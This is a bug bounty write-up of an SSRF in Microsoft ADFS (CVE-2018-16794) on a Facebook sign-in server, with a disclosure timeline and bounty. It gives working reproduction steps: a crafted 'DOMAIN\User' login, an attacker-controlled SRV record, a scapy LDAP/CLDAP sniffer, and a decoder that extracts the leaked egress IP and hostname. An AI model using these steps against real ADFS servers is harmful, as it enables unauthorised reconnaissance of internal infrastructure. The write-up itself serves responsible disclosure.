CVE-2018-16794 on fs.thefacebook.com

According to CVE-2018-16794, there is the possibility of an SSRF on Microsoft ADFS deployments through the “txtBoxEmail” email parameter of the sign-in form. I attempted to see how far I could go with it and was only able to receive a Netlogon response that leaked DnsHostName as well as the corporate IP.

1. Set up a fake primary domain controller. When a user logs in to fs.thefacebook.com using the ‘DOMAIN\User’ format, the ADFS server sends a DNS SRV query for _ldap._tcp.pdc._msdcs.DOMAIN to locate the primary domain controller of ‘DOMAIN’. Because the DOMAIN part of the username is attacker-controlled, that lookup can be pointed at a domain the attacker owns.

On the attacker-controlled domain (example.com below), the following SRV record was used to answer that query; it can be set up easily in domains.google.com, whose custom-record form takes the name, type, TTL and then the SRV data:

_ldap._tcp.pdc._msdcs SRV 10m 0 100 389 any.example.com

The SRV data format is

[priority] [weight] [port] [target]
0 100 389 any.example.com

where the target is the host the ADFS server will contact on port 389 as its supposed primary domain controller, so it must point at the machine that runs the listener below.

So an nslookup query for the record looks like

nslookup -type=SRV _ldap._tcp.pdc._msdcs.example.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
_ldap._tcp.pdc._msdcs.example.com service = 0 100 389 any.example.com.

2. Set up a listener on the remote host (any.example.com)

# Adapted from https://github.com/jstnkndy/scripts/blob/master/dns_listener.py
# Sniffs LDAP (TCP 389) and CLDAP (UDP 389) traffic on the given interface and
# prints the source address and port of every packet. Needs root for sniffing.
import argparse
import signal
import sys

from scapy.all import IP, TCP, UDP, sniff


def pkt_callback(pkt):
    # The source IP is the egress address of the host doing the DC lookup.
    print(pkt[IP].src)
    if TCP in pkt:
        print(pkt[TCP].sport)
    if UDP in pkt:
        print(pkt[UDP].sport)
    # Dump every layer, including the raw LDAP payload.
    pkt.show()


def signal_handler(signum, frame):
    print("Caught signal, exiting!")
    sys.exit(signum)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--interface", required=True, help="Interface to sniff on")
    args = parser.parse_args()
    signal.signal(signal.SIGINT, signal_handler)
    # BPF: 'and' binds tighter than 'or', so this matches port 389 over either protocol.
    bpf_filter = "tcp and port 389 or udp and port 389"
    sniff(iface=args.interface, filter=bpf_filter, prn=pkt_callback)


if __name__ == "__main__":
    main()

It sniffs for any TCP or UDP traffic on port 389 (LDAP/CLDAP) on the given interface and prints the source address and port of each packet.

3. Start the listener on the remote host, then log in to fs.thefacebook.com with the DOMAIN part of the username set to the attacker-controlled domain

dns_listener.py --interface eth0

Username: example.com\example123
Password: doesnotmatter

The traffic that arrives at the listener reveals the corporate egress IP address of the ADFS server and its DnsHostName, even though no valid credentials were supplied.
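What the listener sees on UDP 389 is the CLDAP "LDAP ping" that the Windows DC locator sends to whatever host the SRV record named. The following is an added example, not code from the original writeup or from jstnkndy's repository: it builds such a ping with a minimal BER encoder and decodes one back into its fields, so the raw payload the listener prints (for instance bytes(pkt[Raw].load) in the scapy callback) can be turned into the domain being searched and the name of the requesting host. Attribute names follow MS-ADTS 6.3.3.1 (DnsDomain, Host, NtVer, with the Netlogon attribute requested); the domain example.com, the hostname ADFS01, the NtVer value and the address 203.0.113.10 are constructed sample data.

```python
# Added example (not from the original writeup): build and decode the CLDAP
# "LDAP ping" that the Windows DC locator sends to UDP/389 on the host named by
# the _ldap._tcp.pdc._msdcs SRV record. Field names follow MS-ADTS 6.3.3.1;
# the domain, hostname, NtVer value and IP below are constructed sample data.


# --- minimal BER/LDAP encoder (only what a SearchRequest needs) -------------
def ber_len(n):
    """Encode a BER length in short form (<128) or long form."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def octets(value):  # OCTET STRING
    return tlv(0x04, value if isinstance(value, bytes) else value.encode())


def integer(n):  # INTEGER, non-negative; the extra byte keeps the sign bit clear
    return tlv(0x02, n.to_bytes(n.bit_length() // 8 + 1, "big"))


def enumerated(n):
    return tlv(0x0A, bytes([n]))


def equality(attr, value):  # Filter.equalityMatch [3] AttributeValueAssertion
    return tlv(0xA3, octets(attr) + octets(value))


def build_ldap_ping(dns_domain, host, ntver, msg_id=1):
    """LDAPMessage { messageID, SearchRequest } for
    (&(DnsDomain=<dns_domain>)(Host=<host>)(NtVer=<ntver>)) attrs=Netlogon."""
    filt = tlv(0xA0, equality("DnsDomain", dns_domain)          # Filter.and [0]
                     + equality("Host", host)
                     + equality("NtVer", ntver.to_bytes(4, "little")))
    search = tlv(0x63,                                          # [APPLICATION 3] SearchRequest
                 octets("") + enumerated(0) + enumerated(0)     # baseObject, scope, derefAliases
                 + integer(0) + integer(0) + tlv(0x01, b"\x00")  # sizeLimit, timeLimit, typesOnly
                 + filt + tlv(0x30, octets("Netlogon")))        # filter, attributes
    return tlv(0x30, integer(msg_id) + search)                  # LDAPMessage SEQUENCE


# --- minimal BER decoder ----------------------------------------------------
def read_tlv(buf, pos=0):
    """Return (tag, value, next_pos) for the TLV starting at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def iter_tlvs(buf):
    pos = 0
    while pos < len(buf):
        tag, value, pos = read_tlv(buf, pos)
        yield tag, value


def parse_ldap_ping(packet):
    """Return {attribute: raw value} for the equality assertions of an LDAP ping."""
    tag, msg, _ = read_tlv(packet)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage")
    _, _msgid, pos = read_tlv(msg)          # messageID
    tag, search, _ = read_tlv(msg, pos)
    if tag != 0x63:
        raise ValueError("not a SearchRequest")
    fields = list(iter_tlvs(search))
    filt_tag, filt = fields[6]              # baseObject..typesOnly occupy 0-5, filter is 6
    if filt_tag != 0xA0:
        raise ValueError("expected an AND filter")
    out = {}
    for tag, ava in iter_tlvs(filt):
        if tag == 0xA3:
            (_, attr), (_, val) = list(iter_tlvs(ava))
            out[attr.decode()] = val
    return out


def describe_ping(src_ip, payload):
    """What the capture gives away: egress IP, domain searched, requesting host."""
    f = parse_ldap_ping(payload)
    return {
        "egress_ip": src_ip,
        "domain_searched": f["DnsDomain"].decode(),
        "requesting_host": f["Host"].decode(),
        "ntver": int.from_bytes(f["NtVer"], "little"),
    }


# Constructed sample: what a host named ADFS01 looking for example.com would send.
SAMPLE_PING = build_ldap_ping("example.com", "ADFS01", 0x20000006)

if __name__ == "__main__":
    print(describe_ping("203.0.113.10", SAMPLE_PING))
```

In the listener, pass `pkt[IP].src` and `bytes(pkt[Raw].load)` to `describe_ping` to get the same summary from a live capture; the decoder only walks the three TLV levels it needs and rejects anything that is not an AND-filter SearchRequest.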

Impact

A system in Facebook’s infrastructure was identified which could make external requests in an unexpected way. Facebook hardened the infrastructure to avoid such behavior.

Timeline

Mar 11, 2019 – Report sent
Mar 11, 2019 – Confirmation of submission by Facebook
Sep 11, 2019 – Update from Facebook:
Hi Philippe,

The product team is working on a fix for this issue as it is a bit of a complex fix. Thanks for your patience. We will follow-up with you when the issue is fixed.

Oct 1, 2019 – Update from Facebook:
Hi Philippe,

Just finished chatting with the team and they’ve hardened the infrastructure here to address this issue.

Oct 2, 2019 – $1000 Bounty awarded by Facebook